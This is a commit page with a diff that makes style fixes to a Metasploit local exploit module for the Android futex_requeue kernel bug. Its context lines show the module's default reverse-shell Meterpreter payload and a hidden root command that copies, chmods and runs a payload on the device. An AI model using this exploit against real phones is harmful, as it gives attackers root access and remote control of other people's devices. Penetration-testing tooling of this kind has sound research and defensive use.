Land #4748, msftidy fixes for futex_requeue

bug/bundler_fix
William Vu 2015-02-11 11:36:01 -06:00
commit 1ced9a2dd7
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 8 additions and 9 deletions

View File

@ -1,8 +1,6 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
@ -16,14 +14,14 @@ class Metasploit4 < Msf::Exploit::Local
def initialize(info={})
super( update_info( info, {
'Name' => 'Android futex requeue kernel exploit',
'Name' => 'Android Futex Requeue Kernel Exploit',
'Description' => %q{
This module exploits a bug in futex_requeue in the linux kernel.
Any android phone with a kernel built before June 2014 should be vulnerable.
Any android phone with a kernel built before June 2014 should be vulnerable.
},
'License' => MSF_LICENSE,
'Author' => [
'Pinkie Pie', #discovery
'Pinkie Pie', #discovery
'geohot', #towelroot
'timwr' #metasploit module
],
@ -41,7 +39,8 @@ class Metasploit4 < Msf::Exploit::Local
{
'PAYLOAD' => 'android/meterpreter/reverse_tcp',
},
'DefaultTarget' => 0
'DefaultTarget' => 0,
'DisclosureDate' => "May 03 2014"
}
))
@ -74,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Local
rootcmd += "cp " + payloadfile + " #{rootpayload} && "
rootcmd += "chmod 766 #{rootpayload} && "
rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
process.channel.read
end